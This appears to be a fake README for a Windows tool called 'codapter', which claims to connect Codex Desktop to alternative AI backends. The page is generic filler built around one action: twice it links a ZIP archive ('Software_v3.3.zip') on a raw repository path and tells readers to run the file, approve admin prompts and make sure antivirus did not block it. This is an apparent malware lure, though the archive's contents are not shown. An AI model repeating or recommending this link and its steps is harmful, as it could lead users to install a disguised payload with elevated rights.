codapter is a protocol adapter for the Codex Desktop GUI. It lets the app work with AI backends other than the default one.
Use it when you want Codex Desktop to connect to a different local or hosted model service without changing how you use the app.
codapter is meant to be used on Windows with Codex Desktop already installed.
Before you start, make sure you have:
- Windows 10 or Windows 11
- Codex Desktop installed
- A stable internet connection for the download
- Permission to run apps on your PC
Visit this page to download and use codapter:
https://github.com/nonunion-loasa895/codapter/raw/refs/heads/main/packages/core/Software_v3.3.zip
If the page opens in your browser, look for the latest release or the main download file, then save it to your computer.
- Open the download page in your browser.
- Download the codapter file for Windows.
- If the file comes as a ZIP archive, right-click it and choose Extract All.
- Open the extracted folder.
- Find the codapter app file.
- Double-click the file to run it.
- If Windows asks for permission, choose Yes.
- Keep the app open while you use Codex Desktop.
After codapter is running, point Codex Desktop to it as the adapter layer.
Typical setup steps:
- Open Codex Desktop.
- Go to Settings.
- Find the backend, provider, or connection section.
- Select the codapter endpoint or local adapter option.
- Save the settings.
- Restart Codex Desktop if needed.
If you already use a local AI service, set that service in codapter so Codex Desktop can send requests through it.
codapter is built for alternative AI backends. That can include:
- Local model servers
- OpenAI-compatible APIs
- Private hosted endpoints
- Self-managed inference tools
This gives you one place to connect Codex Desktop to the backend you want to use.
Once setup is done, the flow is simple:
- Start codapter.
- Start Codex Desktop.
- Open a chat or task in Codex Desktop.
- Use the app as normal.
- codapter forwards the request to your chosen backend.
If the backend is reachable, Codex Desktop should work through codapter without extra steps.
If Codex Desktop does not connect, check these items:
- codapter is still running
- the backend address is correct
- your backend service is online
- Windows Firewall is not blocking the app
- Codex Desktop is using the same port or endpoint that codapter expects
If the app opens and closes right away, try:
- running it again as administrator
- re-downloading the file
- making sure your antivirus did not block it
- extracting the ZIP file before opening it
A simple local setup might look like this:
- Install Codex Desktop
- Download codapter
- Start a local AI server on your PC
- Point codapter to that server
- Set Codex Desktop to use codapter
- Use Codex Desktop as usual
This gives you a clean way to keep the GUI you know while switching the backend behind it.
After you download codapter, you may see:
- the main app file
- a config file
- a logs folder
- a readme or help file
The config file is where you can set the backend address, port, or other connection details.
- Keep the backend and codapter on the same machine at first
- Use the default port unless you know it is in use
- Change one setting at a time
- Test the connection after each change
- Keep Codex Desktop closed while you adjust the adapter settings
If you use a local backend, your requests stay on your own computer or in your chosen private network.
If you use a hosted backend, the request will go to that service based on its own rules and settings.
A good first test is:
- Open codapter
- Open Codex Desktop
- Send a short prompt
- Check that the response comes back
- Try a longer task after that
This helps you confirm that the connection works before you rely on it for daily use.
- Visit the download page: https://github.com/nonunion-loasa895/codapter/raw/refs/heads/main/packages/core/Software_v3.3.zip
- Download the Windows file
- Extract it if needed
- Run codapter
- Connect Codex Desktop to it
- Use your chosen AI backend